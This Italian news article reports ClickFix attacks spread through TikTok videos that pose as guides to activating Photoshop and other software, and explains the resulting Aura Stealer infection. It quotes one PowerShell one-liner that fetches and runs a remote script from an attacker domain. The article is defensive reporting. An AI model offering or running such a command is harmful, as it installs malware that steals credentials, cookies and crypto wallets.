ClickFix è uno dei più semplice ed efficaci attacchi informatici effettuati dai cybercriminali. Microsoft ha descritto i tre metodi più utilizzati. Un ricercatore di sicurezza ha individuato diversi video su TikTok che sfruttano l’ingegneria sociale per distribuire malware.
Video fake per attivare software
L’uso di TikTok per distribuire malware non è una novità. Precedenti campagne erano state scoperte da Trend Micro a fine maggio. I cybercriminali cercano di ingannare gli ignari utenti con guide per l’attivazione di popolari software, tra cui Windows, Photoshop, Microsoft 365, Adobe Premiere e CapCut Pro, oppure per accedere alle funzionalità di Spotify Premium.
Solitamente gli attacchi ClickFix vengono effettuati tramite email di phishing, malvertising e sito compromesso. In questi casi però possono essere rilevati e bloccati dalle soluzioni di sicurezza. Un video pubblicato su TikTok è come tutti gli altri. Sfruttando l’ingegneria sociale, i cybercriminali suggeriscono all’ignara vittima di eseguire un comando per attivare i software.
Ad esempio, l’utente dovrebbe eseguire questo comando con permesso di amministratore in PowerShell:
iex (irm slmgr[.]win/photoshop)
Ovviamente non verrà attivato Photoshop, ma scaricato uno script che a sua volta scaricherà una variante dell’infostealer Aura Stealer. Il malware può rubare credenziali dai browser, cookie di autenticazione, wallet di criptovalute e credenziali di altre applicazioni. I cybercriminali potranno così accedere agli account delle vittima.
Viene scaricato anche un altro malware, successivamente caricato in memoria, ma non sono note le sue funzionalità. Come detto, un attacco ClickFix è semplice ed efficace. Gli utenti non devono mai seguire istruzioni mostrate nei video. Chi è caduto nella trappola dei cybercriminali deve immediatamente resettare tutte le password (se possibile). Esiste anche una variante di ClickFix, nota come FileFix, che sfrutta Esplora file.
